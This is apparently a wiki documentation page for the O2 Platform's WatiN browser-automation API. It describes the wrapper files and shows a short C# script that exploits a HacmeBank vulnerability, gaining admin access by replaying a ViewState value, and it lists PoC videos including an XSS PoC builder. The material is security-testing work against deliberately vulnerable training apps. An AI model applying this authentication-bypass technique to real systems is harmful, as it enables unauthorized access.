O2 API/WatiN

From

WatiN_IE.cs - O2 object that wrap's WatiN's main IE (Internet Explorer) object and allows the transparent use of WatiN as a stand alone IE instance or inside an O2 Module
WatiN_IE_ExtensionMethods.cs - Number of .NET Extension methods that simplify the use and scripting of WatiN's object (and allow for the quick creation of Web Unit Test)
Open 'Test Recorder' in new process.h2 - Simple script that can be used to start the WatiN's recorder

Note that this version uses WatiN 1.x branch since at the time it was integrated into O2 , the 2.x was not very stable (the source code currently used was imported into O2's '3rd party Dlls' code tree and can be seen here #trunk/SourceCode_3rdParty_Dlls/WatIN)

multiple WatiN script samples

see O2 API/WatiN/Script Samples

example of O2's watin use

Here is an example of how WatiN's is integrated into O2's Web Unit Test scripting worfkow and allows for the creation of simple scripts that perform complex tasks. In this case this is a HacmeBank vulnerability where it is possible to login into the Admin section by using a value stored into the Admin's login page ViewState:

			var  GuiControl = new Panel()
			...
			var Browser = GuiControl.add_IE();
    			Browser.silent(true);
			....
			Browser.open(StartUrl);  
			Browser.field("txtUserName").value("jv").flash();
			Browser.field("txtPassword").value("jv789").flash();
			Browser.button("Submit").click();
			Browser.link("Admin Section").flash().click(); 				
			var response = Browser.viewState().ViewState_Values[12];		
			Browser.field("_ctl3:txtResponse").value(response).flash();	
			Browser.button("Login").flash().click();

Some of the PoCs Scripts and APIs that use WatiN

Videos that show WatiN in action

HacmeBank - exploit's execution gui

WebGoat - First Example of O2's WebGoat API .avi

O2 Platform - XSS PoC builder.avi

Using WatiN to create a GMail account

O2 Script - API for BTOpenZone

Search

Navigation

SEARCH

TOOLBOX

LANGUAGES